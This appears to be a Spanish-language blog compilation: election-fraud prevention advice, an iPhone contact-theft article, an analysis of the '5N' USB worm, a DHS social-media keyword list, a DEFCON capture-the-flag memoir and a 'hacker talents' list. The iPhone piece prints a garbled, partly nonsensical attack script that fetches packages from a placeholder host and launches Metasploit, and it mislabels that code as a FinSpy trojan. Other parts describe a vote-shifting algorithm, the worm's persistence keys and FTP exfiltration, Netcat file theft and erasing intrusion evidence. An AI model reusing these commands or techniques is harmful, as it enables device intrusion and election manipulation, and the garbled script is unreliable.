Algunos datos informáticos para prevenir un fraude electoral

Es muy frecuente que en tiempos electorales, la oposición se empeñe en tomar en cuenta tópicos que puedan ayudarles a evitar un fraude electoral, entre los más antiguos están.

·         Robo de urnas

·         Compra de votos

·         Cambio de votos por despensas o bienes

·         Traslado masivo de fuerza pública o militar a zonas para que puedan votar donde el partido gobernante no tiene forma de ganar.

Normalmente ponen observadores confiables en las mesas de votación para que al momento del conteo de papeletas estar seguros que su candidato recibirá los sufragios reales obtenidos.

Pero todos los resultados obtenidos en la mesa de votación deberán llegar al ente encargado del conteo general.

Ahora es más fácil obtener votos ilegales sin necesidad de hacer robo de urnas o sustracción de ellas; veamos algunas técnicas.

1.- Normalmente los observadores internacionales o de la oposición no ponen ingenieros de cómputo o auditores informáticos que den fe que la base de datos está completamente vacía antes de que ingresen los votos.

2.- No validan que si existe un sitio o base de datos alterna en caso de desastres esta base también este vacía y que se hagan pruebas previas que vayan poniendo en tiempo real la captura de la base de datos primaria.

3.- No validan que en caso de que casualmente un mal conductor choque “sin querer” con un poste y deje sin luz toda la manzana donde está la entidad encargada del conteo, las plantas eléctricas y unidades UPS tengan la capacidad de poder continuar con la operación de recepción de votos al menos con 12 horas posteriores al desastre.

En caso de que se caiga el sistema al volver a levantar lo hará con la base alterna favoreciendo a alguien en caso de que no está vacía o nadie valido que es una base espejo con la original.

4.- Los Ingenieros de software encargados de hacer cómputo forense o investigación de fraude no detectan en los programas de conteo técnicas de salami o la famosa 3 x 1 que ayuda a manipular datos con un simple algoritmo, esto es; por cada voto recibido a la letra A o B asignas uno al C, o por cada 3 recibidos al C asignas tres más descontándolo a A o B.

Puse ejemplo de un voto, pero puede hacerse por cada 100 manda 30, o por cada X manda Y

Cuando estas técnicas se usan la ventaja de ganancia es mínima entre candidato de oposición y el oficialista lógicamente ganando a quien favoreció el algoritmo, forzando al reconteo voto por voto, pero cuando esto pasa ya se decretó al ganador, jamás ha ganado alguien tras el reconteo.

5.- Oruga de transferencia, si el método de transferencia de datos hacia la base de datos de  contingencia no es vía hardware como replicadores vía storage o softwares de casas confiables, pueden usarse algoritmos que transfieren cada x minutos, sin embargo ya llevan el algoritmo 3x1 y solo es esperar que la contingencia se vuelva la base de producción.

Por eso antes de las elecciones se debió validar

1.- Que las bases de datos están completamente vacías inclusive una hora antes que inicie la recolección.

2.- Que las bases de contingencia reciban en tiempo real los votos y muestren en grandes monitores el conteo, se deben hacer las pruebas con al menos 10 mil votos y validar que lo que entró en producción sea idéntico en contingencia.

3.-Que al menos entren los  ups y planta eléctrica sin interrupción o caída del sistema y si esto ocurre que el cambio sea transparente, debe haber bidones de diésel cerca de la planta para rellenarla en caso que entre en operación.

4.- Que una firma confiable de auditoría de software valide que el software usado para el conteo no cuenten con algoritmos ocultos que realicen cambios.

5.-Los observadores puestos por la oposición también estén en centro de cómputo donde se lleva el conteo a fin de evitar algo anormal.

6.- Con el ingreso de las redes sociales, se puede crear un hastag con un nombre, ejemplo #conteo en el cual los observadores publican la foto con el resultado de cada casilla y un alguien podrá llevar el conteo extraoficial también.

7.- No permitir votos sin cedula del sector al que le pertenece, con esto fuerzas policiales o armadas no podrían votar en zonas a las que no pertenecen.

8.- Certificación de una firma de auditoría confiable para validar que en caso de una catástrofe podrá entrar bien la contingencia sin problema, que los contratos de mantenimiento con proveedores, internet, planta eléctrica, empresas eléctricas etc etc tendrán gente en sitio para reactivar rápidamente la producción.

Los datos de este tipo de fraude has sido recolectado de elecciones ocurridas en Latinoamérica, áfrica y Asia en los últimos 20 años.

 

Sabes como los hackers obtienen la agenda de tu ipad o iphone?

Este es un ejemplo de diversos ataques con el fin de obtener la agenda telefónica de un ipod o ipad.
El escrito es puramente documental y con la finalidad de prevenir a los usuarios de este tipo de ataques.
Lo primero que hace un ciberdelincuente es conseguir una herramienta de empaquetado APT (Advance Packing Tool) hecho con C o C++ para debian, con la finalidad de obtener el UDID del iphone y una dirección de correo registrada.
(Aquí solo parte del código)
# Instala treemelo
apt-get update
apt-get dist-upgrade
apt-get install wget subversion
# Descargamos la version de ruby y sus dependencias
wget http://xxxx.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb
# Instala ponchalo
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb
# Borra ponchalo
rm -rf *.deb
#Hacemos una variable privada a fin de enganchar los datos
Dpget mail.mai cat var
cd /private/var
#descargan un troyano tipo FinSpy del sitio
svn co https://www.xxxx.com/svn/framework3/trunk/ msf3
cd msf3/
# Corren el rubi descargado anteriormente y reportara la lista de contactos al directorio creado
ruby msfconsole
etc
etc
etc
Otra forma es con un APT de una Fake CA y un mitm: Ya que averiguan su correo y le envian una fake CA para luego hacer un mitm con un rogue AP cercano. Después le mandan a un portal cautivo que le pedira su contraseña de Apple iTunes. Con ella accederan a su backup en iCloud y descargaran los contactos.
Otra forma es
Con un JailOwnMe: si la victima no tiene actualizado el software de su iPhone es vulnerable a los exploit de comex. Le mandan un tweet con un link a un PDF muy tentativo y cuando lo abra tendran una shell con JailOwnMe que permitirá acceder a sus contactos.
También puede ser con un Address Bar Spoofing: si el usuario no tiene iOS 5.1.1 o iOS 6 le envian un link al twitter cuando está twitteando para que entre en un phishing hecho con address bar spoofing y le robaran el password de iCloud. Desde allí descargaran su agenda.
O Si la victima tiene sincronizado su Gmail con su iPhone: Un Phishing burdo por correo electrónico o Twitter, la victima pone su password y se accederá a los contactos de Gmail para descargar su agenda en un csv.
Hasta con un backup involuntario: Si la victima conecta su terminal a un equipo para que se cargue la batería, en un descuido le hacen un backup con el iTunes.
Un programa de ForenseTeniendo acceso físico al dispositivo, lo ponchamos a un Oxygen Forensics y en 10 minutos volcaran todo el terminal un usb.
O a través de un hijacking de Facebook: si la victima tiene iOS 6, ha sincronizado su iPhone con Facebook pero se conecta desde redes WiFi inseguras y le capturan una cookie de sesión de Facebook. Le hacen un hijacking a su cuenta y se descargan todos los contactos.
Inclusive preguntando a Siri: si la victima tiene un iPhone 4S con Siri activado, alguien tiene acceso al dispositivo y se dedica a preguntarle a Siri todos los teléfonos de la agenda que le interesan.
Por último JavaScript Botnet: Si el iPhone de la victima se conecta a una Rogue WiFi que se llama Public o Free. la victima se había conectado anteriormente a una red llamada así y como iPhone no comprueba el BSSID se come una JavaScript Botnet con la que le hacen un Phishing.
Que recomiendo para prevenir:
1.- Tener en todo momento apagado el bluetoot si no se usa
2.- Haga caso omiso a los mensajes directos con links y más si son descargables
3.- Cualquier apertura y cerrado de pantallas anormal poner el dispositivo en modo avión o apagarlo completamente de inmediato.
4.-No sincronice su Iphone a Facebook desde redes desconocidas
5.- No por ser presumido actives siri para ver como hablas con tu equipo, mejor usa los métodos convencionales para consulta.
6.- Cuidado en los sitios que ingresas y el software que descargas puedes ser victima de suplantación fácilmente.
By @edgarulloa

El virus 5N

Un nuevo virus apodado como 5N, podría llevar a cabo acciones dañinas en los equipos infectados para, entre otras cosas, recopilar información o impedir su utilización a partir del 5 de Noviembre 2012.

Recursos afectados

Equipos con sistema operativo Windows xp, windows 7, windows 8

Solución

Para detectar si un equipo se encuentra infectado para un usuario concreto, bastaría con iniciar sesión con el mismo usuario y pulsar las teclas "Shift" + "Ctrl" + "Alt" + "F7" y comprobar si aparece una ventana que solicita contraseña. Dicha ventana es invocada por el propio virus y permite introducir una contraseña para detener las acciones del mismo en el sistema. En el caso de introducir una contraseña incorrecta 3 veces procede a apagar el equipo.
Por tanto, si se mostrara dicha ventana a la hora de pulsar la combinación de teclas descrita anteriormente, serían síntomas de infección.
Otra opción para detectar si su equipo está infectado es iniciar la utilidad de símbolo del sistema a (Inicio > Ejecutar > cmd) y ejecutar los siguientes comandos :

• dir %SystemDrive%\ /a /b /s | findstr -i drmvclt.exe
• dir D:\ /a /b /s | findstr -i drmvclt.exe

El segundo comando habrá que ejecutarlo en el caso de que el ordenador tenga más de una unidad: D:\, E:\, F:\, etc. Habría que cambiar la letra D:\ por la que corresponda.
En el caso de mostrar alguna salida los comandos anteriores, las cuales se corresponderían con las rutas en el sistema donde se encuentra almacenado el virus drmvclt.exe, se deberán anotar las mismas para posteriormente proceder a su eliminación.

Detalles

Se ha descubierto un nuevo virus que estaría programado para impedir la utilización del equipo el día 5 de Noviembre.
El virus es capaz de reproducirse a través de dispositivos extraíbles (pen drives, discos duros externos, etc.) pudiendo así infectar aquellos equipos en los que se conecta el dispositivo extraíble. Una vez infectado el equipo, el virus modifica su configuración (el registro de Windows) para garantizar su permanencia en él. Además, también es capaz de recopilar información sobre el ordenador comprometido (como por ejemplo el nombre, la fecha actual, etc.) para enviarla posteriormente a servidores remotos.
En el caso de conectar un dispositivo extraíble en un ordenador infectado (por ejemplo, un USB de almancenamiento), el virus lo infectará. Para ello, marcará todas las carpetas que encuentre en el directorio raíz del dispositivo como ocultas con el fin de que no sean visibles para el usuario. Además, creará tantas copias de sí mismo como carpetas haya encontrado manteniendo el nombre de las originales. De esta forma cuando un usuario conecte un dispositivo USB infectado en su ordenador no verá las carpetas originales sino las carpetas generadas por el virus. Estas carpetas son realmente una copia del virus (un fichero ejecutable) de forma que cuando se haga clic en alguna de ellas para ver su contenido, el virus infectará el equipo de forma totalmente transparente al usuario. Además, para evitar sospechas, una vez el usuario haga clic en la carpeta falsa, el virus mostrará el contenido del directorio legítimo.

 

Cuando el virus detecte la fecha del 5 de Noviembre mostrará multitud de botones de apagado en puntos aleatorios de la pantalla de forma que si el usuario pulsa en alguno de ellos el equipo se apaga. El virus también puede modificar el fondo de escritorio.

Subrutina de fecha:

.text:004022FC ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

.text:004022FC

.text:004022FC ; Attributes: thunk

.text:004022FC

.text:004022FC ; int __stdcall GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)

.text:004022FC GetDateFormatA  proc near               ; CODE XREF: sub_401250+2C0p

.text:004022FC                                         ; sub_401250+2D9p

.text:004022FC                 jmp     ds:__imp_GetDateFormatA

.text:004022FC GetDateFormatA  endp

 

Kernel call:

.idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)

.idata:00405238                 extrn __imp_GetDateFormatA:dword

.idata:00405238                                         ; DATA XREF: GetDateFormatAr

 

Con esto asegura que:

Los ataques comenzaran desde el día 5 de noviembre 2012

El código llega en un ejecutable llamado 5N.exe (Aunque podría cambiar). Cuando se instala, genera varios ficheros, siendo elñ principal drmvclt.exe. Este ejecutable, presenta un icono similar a una carpeta de Windows, con el fin de intentar pasar desapercibido en el equipo.
El codigo realiza las siguientes acciones:

• Crea una serie de archivos en el sistema comprometido.
• Crea una en el registro de Windows para garantizar su permanencia en cada reinicio.
• Obtiene datos de la instalación del sistema.
• Se conecta al dominio ftp.drivehq.com para enviar la información capturada.
• Infecta todos los dispositivos extraíbles que se conecten al equipo.
• Impide la utilización normal del equipo los días 5 de noviembre.

La infección en el equipo se produce al ejecutar el fichero drmvclt.exe. Una vez ejecutado realiza las siguientes acciones en el equipo víctima:

1. Se copia a sí mismo en el sistema.
2. Modifica el registro de Windows para iniciarse de forma automática en el arranque del sistema.
3. Infecta los dispositivos extraíbles insertados para infectar otros equipos.
4. Recopila información del sistema y la manda a un servidor remoto

A continuación se describen estos 4 pasos:
1.- El gusano se copia a sí mismo en el sistema. El directorio depende de los permisos del usuario infectado, por lo que intenta copiarse en distintas rutas. En caso de no poder copiarse en la primera, lo intenta en la segunda, etc. Las posibles rutas en las que intenta copiarse son las siguientes (Y en este orden):

1. C:\WINDOWS\system32
2. C:\Documents and Settings\All Users\
3. %USERPROFILE%\
4. D:\

2.- El gusano modifica el registro de Windows con el fin de asegurarse su ejecución en cada reinicio del equipo, utilizando la ruta donde ha sido copiado ([RUTA_EJECUTABLE]). Intenta crear las siguientes claves, en el orden indicado:

1. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run\"drmvclt"="[RUTA_EJECUTABLE]"
2. HKCU\SOFTWARE\ Microsoft\Windows\CurrentVersion\run\"drmvclt"="[RUTA_EJECUTABLE]"

3.- El gusano se propaga a todas las unidades extraíbles que se conectan a sistema, tal y como se explica en la sección de propagación.


4.- Al inicio de su ejecución, el gusano recopila la siguiente información del equipo infectado:

• Nombre de equipo
• ProductId
• ProductName
• RegisteredOrganization
• RegisteredOwner
• Fecha actual

Esta información se guarda en un fichero en una de las siguientes rutas, en el orden indicado:

1. C:\[ProductId]_[NombreEquipo].cfg
2. D:\[ProductId]_[NombreEquipo].txt

Dicho archivo es enviado mediante FTP al servidor "ftp.drivehq.com", en el caso de que el identificador de Producto (ProductId) sea distinto a "55274-641-6828477-23781" y a "00359-OEM-8992687-007".
De esta manera, si se infecta el equipo con un usuario con privilegios de administración la infección afectará a todos los usuarios que inicien sesión en el Sistema, y en cambio, si el usuario no tiene privilegios, sólo afectará a este usuario.
El archivo una vez enviado es finalmente eliminado por el propio código dañino.

Funcionamiento detallado

Al ejecutarse, lo primero que hace el programa es comprobar si se está ejecutando en el directorio raíz de una unidad extraíble y si existe una carpeta con el mismo nombre que el archivo ejecutable, en cuyo caso abre una instancia del explorador de Windows con el contenido de dicha carpeta. Con ello el código dañino simula la apertura normal de las carpetas de los dispositivos infectados, pasando así inadvertida la infección del equipo a los ojos del usuario.
Posteriormente comprueba si ya existe otro proceso del propio código dañino ejecutándose en el sistema, en cuyo caso finaliza la ejecución. Para ello consulta los nombres de los procesos en ejecución, y los compara con las cadenas ‘drmvclt’, ‘5N’ y ‘5N.vshost’. Además, en caso de estar ejecutándose desde el directorio/carpeta raíz de una unidad extraíble, los compara también con los nombres de las carpetas existentes en el directorio/carpeta raíz de dicha unidad.
A continuación recopila la información del sistema, almacenándola en un archivo que posteriormente envía mediante FTP al servidor "ftp.drivehq.com", tal y como se explicó anteriormente.
El gusano está en todo momento monitorizando los eventos de conexión/desconexión de dispositivos extraíbles, para proceder o no a la infección del dispositivo extraíble.
El código dañino contiene una serie de temporizadores, componentes que ejecutan una función concreta cada cierto tiempo. A continuación se indican las funciones de los temporizadores más relevantes que se han encontrado dentro del código dañino:

1. TIMER1Se activa durante la carga inicial del programa. Comprueba si la fecha actual del equipo es 5 de noviembre y si el identificador de producto "ProductId "del sistema es distinto de ‘55274-641-6828477-23781’, en cuyo caso llama al proceso ‘destino_final’, que activa los temporizadores 3, 4 y 6 (Timer3, Timer4 y Timer6), reproduciendo a continuación la música que se encuentra contenida en el ejecutable de manera cíclica hasta que se apague el equipo.
   Por otra parte, monitoriza si el usuario realiza la pulsación conjunta de las teclas ‘Ctrl’ + ‘Alt’ + ‘Shift’ + ‘F7’, en cuyo caso muestra una ventana de acceso en la que pide una contraseña, deteniendo el temporizador Timer5.
   En caso de introducir la contraseña ‘dpmjaca’, activa Timer3, Timer4 y Timer6. En caso de introducir la contraseña ‘dpmjaca57’ se cierra el programa, y en caso de introducir 3 veces una contraseña no contemplada, procede a apagar el equipo.
2. TIMER2Tiene como función la de asegurarse la permanencia del código dañino en el sistema. Para ello se intenta copiar a sí mismo en las rutas ya mencionadas, e intenta crear las claves de registro necesarias para su inicio automático con el sistema.
3. TIMER3Se activa cuando se cumplen las condiciones impuestas por Timer1, siendo su función la de guardar la imagen que se encuentra contenida en el ejecutable (que presenta una careta de Anonymous) en una de las siguientes rutas, según los permisos del usuario, y de sustituir el fondo de escritorio por dicha imagen.
   
   1. C:\WINDOWS\system32
   2. C:\Documents and Settings\All Users\
   3. %USERPROFILE%\
   4. D:\
   Por último, procede a realizar la apertura de la unidad de CD-ROM/DVD.
4. TIMER4Su función es la de monitorizar la lista de procesos en ejecución y eliminar todos aquellos procesos cuyo nombre sea ‘taskmgr’, cerrando así la ventana de administración de tareas de Windows. De esta manera evita que el usuario elimine y/o vea el proceso correspondiente al código dañino.
5. TIMER5Tiene como función la de mostrar repetidamente botones de apagado del sistema en puntos aleatorios de la pantalla o/y en aquellos lugares donde se encuentra posicionado el puntero del ratón, de tal forma que si el usuario pulsa alguno de ellos el equipo se apaga.
6. TIMER6Se encarga de iniciar y detener Timer5, así como cambiar sus intervalos de actuación de manera cíclica, provocando que los botones creados por Timer5 se generen a distintos intervalos de tiempo.

 

Las palabras favoritas de Homeland

El Departamento de Seguridad Nacional de EE.UU (Department of Homeland Security) controla todas las actualizaciones de los usuarios que se realizan en las redes sociales, fundamentalmente enFacebook y Twitter. Su objetivo es, según ha publicado hoy la web animalnewyork.com, el descubrir aquellos “Artículos de interés” (IOI) que puedan amenazar la seguridad nacional.

La fuente original de esta información parece ser un documento interno emitido por el Department of Homeland Security. En él se orienta a los responsables de esta actividad de espionaje en las redes socialescuáles son aquellos términos o palabras que deberán ser vigilados de cerca en cada actualización de los usuarios en sus respectivos perfiles personales, todo ello en tiempo real.

Según reconoce Joel Johnson, autor del artículo que divulga esta actividad de espionaje del Gobierno de EE.UU, el Department of Homeland Security mantiene una política de privacidad que intenta separar la información personal, Personally Identifiable Information (PII), de los Tweets que son agregados cada segundo o de las actualizaciones de los usuarios de Facebook.

Sin embargo, entre el contenido que sí se fijan los especialistas del Department of Homeland Security están aquellos que se relacionan con las declaraciones de funcionarios de alto rango del Gobierno de EE.UU, o cualquier otro gobierno extranjero; los funcionarios públicos o del sector privado, y sus respectivos portavoces; los nombres de famosos, presentadores de televisión, reporteros en lugares de siniestro; además de los nombres de terroristas, líderes de cárteles de la droga u otra persona que sea de interés de Seguridad Nacional.

Por otra parte, se dispone de una lista de términos o palabras claves que son monitoreados las 24 horas en los muros o TimeLine de las diversas redes sociales, sobre todo en Twitter. Esta lista de palabras claves está dividida en secciones y entre las principales temáticas que la componen están:

1. Agencias del Gobierno de EE.UU. Las palabras claves vigiladas son: Departamento de Seguridad Nacional, Federal Emergency Management Agency, Secret Service  o el Centro Nacional de Operaciones, entre otras instituciones.
2. Seguridad Interior. Las palabras que levantan sospechas son: asesinato, atacar, seguridad nacional, perforar, policías, recuperación, bomba sucia, milicia, disparos, rehén, explosión, pandillas y estado de emergencia entre otras.
3. Materiales peligrosos y nucleares: materiales peligrosos, nuclear, derrame de productos químicos, paquete sospechoso, tóxico, nube, pluma, gas, sarín, Corea del Norte ántrax, radiación o radiactivo, entre otros.
4. Preocupación por la salud +H1N1: brote, contaminación, explosión, virus, bacteria, ébola, aviar, H5N1, los síntomas, mutación o pandemia, entre otros.
5. Infraestructura de seguridad: aeropuerto, infraestructura informática, metro, telecomunicaciones, avión, autoridades portuarias, puerto, muelle, puente o líneas de energía, entre otros.
6. Violencia en la frontera sudoeste: cárteles de la droga, violencia, banda, droga, cocaína, marihuana, México, cárcel, Sinaloa, Tijuana, Juárez, El Paso, Ciudad Juárez, ejército mexicano e inmigrantes ilegales, entre otros.
7. Terrorismo: Terrorismo, Al Qaeda, terror, atacar, Irak, Pakistán, bomba sucia, atacar,  Hamás, las FARC, IRA, ETA, Hezbolá o ataque suicida, entre otros.
8. Seguridad cibernética: botnet, malware, troyano, virus, spammer, phishing, ataques de fuerza bruta, ciber ataque, ciber terrorismo o Anonymous, entre otros.

Resumiendo, cuando alguno de nosotros escribe una de estas palabras claves que se incluyen en esta lista negra en alguno de nuestros muros de las cuentas que tenemos en las redes sociales de internet,fundamentalmente Facebook o Twitter, estamos exponiéndonos a que nuestros mensajes sean leídos o registrados por esta oficina de espionaje online del Gobierno de EE.UU; motivo por el cual debemos siempre estar atentos a lo que escribimos y qué palabras utilizamos en  esa escritura, no vaya a ser que un día nos confundan con algo peor, que puede pasar.

Como bien podemos apreciar, internet se hace cada día más peligrosa, sobre todo en torno al tema de nuestra privacidad online. A propósito, hoy la compañía Google Inc. ha puesto en práctica su nueva política de privacidad de los usuarios en la que toda la información se unirá en un solo campo. En horas de la mañana pude leer un documento en PDF, para ser más precisos, una carta, que desde las autoridades europeas le hacen llegar a la dirección de Google Inc.

Siganme  @edgarulloa

Memoria: La antesala a un concurso internacional de hackers

Mañana calurosa, el registro en el hall del Alexys Park en las Vegas da comienzo a uno de los eventos de hackers mas esperados del año, el famoso DEFCON 11.

Una mochila modesta con un par de laptops, tu rostro nerviosoy tu sentir a la espera de saber la hora de cuando te tocará tu turno y si podrás salir victorioso de la contienda, pues sabes que alli no van personas que solo cambian paginas web u obtienen tus passwords, te provocan overflow de memoria en tu laptop o inclusive te inhiben tu access point o ponen un key logger disfrazado, alli va gente que hace algo mucho mas alla y rayan en lo que se denominaba terrorismo informatico, cibercrimen o espionaje cibernético.

Grupos de jovenes reunidos en las pequeñas mesas de estar, todos alrededor de sus laptos, gente de muchas partes del mundo volcados alli, hackers, expertos en seguridad, policias encubiertos, agentes secretos y muchos más. Todos deseando lo mismo.. saber que nuevas vulnerabilidades hay.

Se publican las fechas de los eventos y la fecha esperada, Domingo 3 de agosto de 2003 de 1 a 3 pm Capture the Flag - Root Fu contest es anunciado.

Te diriges a la apertura del evento, una charla que dará el rey de la encriptación PGP Phil Zimmermann.

Poco a poco los grupos que participaran en el mismo evento que tú ya se juntan a fin de tratar de ver o entender cual será el objetivo, que tipos de firewalls o IDS se usaran para proteger la bandera que le dicen zanahoria en el evento.

Tienes temor de hablar sobre lo que hiciste en tu pasado y te dio la oportunidad de ser elegido para participar en el evento de esa magnitud, no sabes si la persona que esta sentada a tu lado es un hacker o un agente encubierto.

Nadie platica nada salvo los mismos grupos que van, te limitas a ver y tomar tus notas.

Buenas conferencias sobre vulnerabilidades todo el dia y el día siguiente se dan y llega el dia de tu evento.

/:00 am, la noche anterior dormiste muy poco, los nervios te consumieron de no saber cual es el reto a vencer, y trataste de practicar un poco con la red muy bien protegida que te dio el hotel.

Un par de conferencias se dan, una de ellas llamada "hacker la red invisible" y otra "virus metamorficos" llamaron mi atención y asistí a fin de pasar el rato y matar el nervio.

No terminó el ponente cuando me dirigí a la sala donde se llevará acabo la competencia.

Te preguntan si necesitas algo mas, una vez que otorgas tu mac address para matricularte enel access point que entra en la Vlan en donde participaras y la pregunta de siempre.. Usted solo? No tiene un equipo?. Solo te limitas a contestar, trabajo solo, no tengo equipo.

En una modesta mesa te encuentras y a tus alrededores con equipos de 3 a 4 personas, tus competidores tienen nombres muy hostiles o intimidantes, Imunix linux, sharkbait, netzero, inclusive algunos que hacen recordar los desbordamientos de buffer 0x00ff00, Dead Chamaleon y suzukiblaster entre los que recuerdo.

El manager del evento “Ghettohacker” pone el objetivo, extraer un archivo el cual estaba codificado al mero estilo “Enigma code” cuya base de calculo era el nombre del evento “defcon”.

La red estaba conformada por un firewall pix, un IDS y una pc que servia como honey pot en una dmz, de alli el servidor el cual tenia en alguna parte de su disco el archivo carrot.txt que deviese ser descifrado y postearlo al ghetto.

1:00 pm, comienza con el chicharrazo inicial, todos usamos los clasicos softwares para detección de red y enumeración a fin de determinar el acceso, la red esta blindada, el pix esta muy bien configurado y puertos como 21, 23  y 80 estan cerrados.

Al detectar este escenario lo unico que me quedó es plan B, la red inalambrica que aun se encontraba en pañales en ese año.

Un simple codigo WEP de encriptación es lo que me separaba de poder entrar a la configuración al access point cisco que utilizaron para gestionar la vlan.

La red 192.168.4.x asignada para esta competencia no me daba mas alternativas de penetración, sin embargo el servidor utilizado fue el mismo que se utilizará para el evento hacker jeopardi.

Con herramientas como walk chalk, cheops, sub7 y otras de creación propia me permitieron entrar al access point y encontrar la ip del servidor central la cual se ruteaba desde un equipo cisco.

El objetivo estaba directamente fuera del salón de clase, un ruteador que formaba las vlans de todo el evento y que podia ser accesado desde aquel access point.

Para poder pasar transparente a cualquier tipo de IDS, hice un tunel ARP y ejecutando loopcrack y jhonreaper gane el password local system, NetDDE me sirvio para ganar privilegios de system, la ejecución del obligado attrib -h -r *.* , dir *.txt /s y hubicando el archivo los servicios activos y protocolo NetBios activo en ese windows 2000 server me dio oportunidad de mandar mi agente ftp propietario con un Netcat atraves del backdoor que este software abria y pude traer el codiciado archivo con propiedades Hiden.

Eran las 14:32 cuando descifre aquel código y lo puse en la mesa del juez. “who's manage the information have the power” decia el archivo escrito con puros paquetes de 8 digitos.

Mi nickname fue registrado “Anomaly “ y la hora 14:33. inicialmente pude haber sido tequila, sin embargo paisanos mios ya lo tenian registrado con anterioridad.

Ya varios equipos habian entregado información, entonces al terminar el evento anuncian que fuy yo quien descifró y ganó la zanahoria.

Tuve que mostrar la forma como accesé al servidor y obtuve el archivo.

Mis contrincantes llegaron hasta el documento que despues descifraron alli mismo, pero no pudieron extraerlo.

Tras eso me llovieron invitaciones a eventos posteriores como el POSTECH-KAIST de Asia y el participar en firmas creadoras de software de seguridad.

El próximo año traté de llevar un sistema para esteganografiar wavs, o textos dentro de mp3, sin embargo por problemas de salud no asistí nuevamente a defcon.

 Para el año 2005 ya el mundo informático cambió, lo que hacias con herramientas en 2003 en ese año ya son inofensivas a los sistemas de seguridad y nuevamente tratar de encontrar las vulnerabilidades requieren de tiempo. Tiempo que dejas de tener mientras estas laborando en alguna empresa.

Mi ultima participación ya como oyente fue en el pasado Shmoocon 2012, este evento me muestro que siempre habrá alguien con el tiempo y el oscio para tratar de vulnerar lo que los equipos de seguridad dicen tener protegido.

Edgar

Eres Hacker? Analízate

Aqui los doce talentos que debe tener un verdadero hacker.

Últimamente hay un auge por tratar de entender y conocer lo que es un hacker, con la promulgación de un grupo denominado Anonymous, muchos aventureros en el área de informática, se han dado a la tarea de investigar un poco sobre vulnerabilidades y autoproclamarse hackers.

Pero qué es un hacker?

Wikipedia los define como forma corriente para referirse mayormente a los criminales informáticos, debido a su utilización masiva por parte de los medios de comunicación desde la década de 1980.

Yo puedo decirte que un hacker es la elite de las ciencias computacionales, algo así como las fuerzas especiales del computo, lo mas top y selecto en conocimiento.

 Una persona que no necesita herramientas bajadas de internet para hacer una denegación, una intrusión o una extracción o alteración de datos, él mismo crea sus herramientas, conoce las vulnerabilidades básicas, conoce lo elemental para compilar o correr un script sin necesidad de tener programas.

Cómo podemos clasificar los pasos por los que una persona puede llegar a tener esta condecoración?

Aquí los doce talentos de un hacker.

El primer talento: es CONOCER lo básico como lo es un sistema operativo.

La palabra puesta en mayúscula no solo implica el saber ciertos comandos o el manejo del sistema.

Conocer es saber, entender y analizar completamente los módulos de los que se conforma el sistema operativo, cómo interactúa con el procesador, qué ventajas o desventajas tiene cuando corre sobre otros procesadores, qué vulnerabilidades presenta si se encuentra virtualizado o en ambientes clustering, llamese Windows, Linux, unix, openvms, emvs, emvsa, RPG, MPV, Aix, solarix, ESX,Hp-ux, Mac-os etc.

Segundo talento: Tener un profundo conocimiento del sistema de administración de archivos que se pretende atacar (NTFS, FAT, Dec etc), un amplio conocimiento en la creación de controladores (DLL, Aplets, Cerplets etc) que permitan interactuar entre tu equipo de ataque y tus tarjetas (creadas por ti) a fin de que puedan ocultar la identidad y/o recuperar información sin ser detectado, así como entender la segregación de los datos en memoria al hacer un dump o un debug.

Tercer talento: tener un profundo conocimiento acerca de los  protocolos de comunicación, interpretación de encabezados, desmembrado de octetos por un canal  e interpretación de los mismos, la manipulación de dichos octetos para hacer inyección de código, segregación, particionamiento o sustitución. La lógica booleana, el código hexadecimal y los analizadores de protocolos, snifers y packet storms serán tu desayuno, almuerzo y cena.

Cuarto talento: deberás tener amplios y vastos conocimientos en lógica estructural que permitan discernir si el paquete viene cifrado, viene puro, viene encapsulado o en tuneling.

La red es alambrica o inalámbrica?, qué protocolo utiliza?, se monta sobre algún medio?

Quinto talento: Conocimiento profundo en metodologías de cifrado, que permite saber por los primeros seis octetos del paquete, qué tipo de algoritmo de encriptación se está usando y poder emplear el método de descifrado correcto.

Hay Certificado digital?, la red va cifrada por el proveedor de servicio?

Sexto talento: Experto en temas de networking, conocimiento de redes y subredes, como discernir si te encuentras en una red subneteada, si es una red de amplio espectro o si es una lan menos a 255 puntos.

Séptimo talento: Conocimientos en exploración de la red a fin de identificar los elementos que están en ella y entonces puedas poder ingresar si encuentras puntos vulnerables. Conocimiento en Testeo de elementos a fin de determinar los modelos o marcas de equipos de seguridad periférica con los que te encuentras antes de ingresar.

Octavo talento: Conocimiento en manejo y configuración de equipos de video vigilancia, video conferencia y circuito cerrado. CCTV, PTZ etc con tus conocimientos de intercepción de paquetes puedes tomar una señal de video que pase a través de un protocolo no importa que sean cámaras discretas o video conferencias. Eres capaz de interceptar o espiar, conoces ambos métodos.

Noveno talento: Conocimiento en el funcionamiento total de cualquier firewall, IP Access, data Access, IPS, IDS, despachadores de QoS que puedas encontrarte a fin de hacer tus pipas y pasar transparente por ellos.

Decimo talento: Amplio conocimiento en auditoría, a fin de poder identificar paso a paso por donde pasa la información que te interesa interceptar, manipular o destruir y lo mejor aun eliminar tu evidencia una vez que sales de allí y puedas regresar confiadamente las veces que quieras.

Onceavo talento: Amplio conocimiento en utilización de metodologías de reconocimiento de password, vía diccionario de datos, fuerza bruta, aleación mediante algoritmos genéticos, keylogers, spywares etc. Conocimiento extenso en leyes de probabilidades y teoría de juegos aplicada, a fin de realizar programas de reconocimiento en base a la ley de las probabilidades con prueba y error como por ejemplo para la apertura de cerraduras controladas por computadoras o mecanismos no biométricos muy usadas en hoteles y puertas de ciertas corporaciones.

